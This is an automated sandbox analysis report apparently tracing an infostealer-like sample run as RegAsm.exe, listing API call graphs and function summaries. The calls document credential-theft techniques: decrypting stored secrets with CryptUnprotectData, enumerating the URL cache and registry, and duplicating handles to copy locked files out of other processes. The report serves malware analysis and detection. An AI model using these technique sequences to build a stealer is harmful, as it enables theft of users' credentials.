memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 
??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 
38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab ??3@YAXPAX ??3@YAXPAX 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 
38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 ??3@YAXPAX 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab ??3@YAXPAX ??3@YAXPAX 38880->38932 38881->38880 38883 40b633 ??3@YAXPAX 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 
38915->38921 38917 4069a3 ??3@YAXPAX ??3@YAXPAX 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 ??3@YAXPAX 38923->38925 38926 40aa04 ??3@YAXPAX 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 
27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 
39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 
27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 
39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 
39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 ??3@YAXPAX 39322->39323 39324 40cf14 39323->39324 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 
40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 ??3@YAXPAX 39331->39332 39333 40cc15 39332->39333 39334 40aa04 ??3@YAXPAX 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab ??3@YAXPAX ??3@YAXPAX 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 ??3@YAXPAX 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39377->39399 39379 40cedd 39380 40aa04 ??3@YAXPAX 39379->39380 39381 40cee5 39380->39381 39382 40aa04 ??3@YAXPAX 39381->39382 39383 40ceed 39382->39383 39384 40aa04 ??3@YAXPAX 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 

                                                                                Control-flow Graph
                                                                                • Executed
                                                                                • Not Executed
                                                                                (Interactive control-flow graph of the function at 0040DD85-0040E01B; node and edge data not reproduced in text. Called APIs are listed below.)
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                • API String ID: 2018390131-3398334509
                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 2947809556-0
                                                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 1945712969-0
                                                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                Memory Dump Source
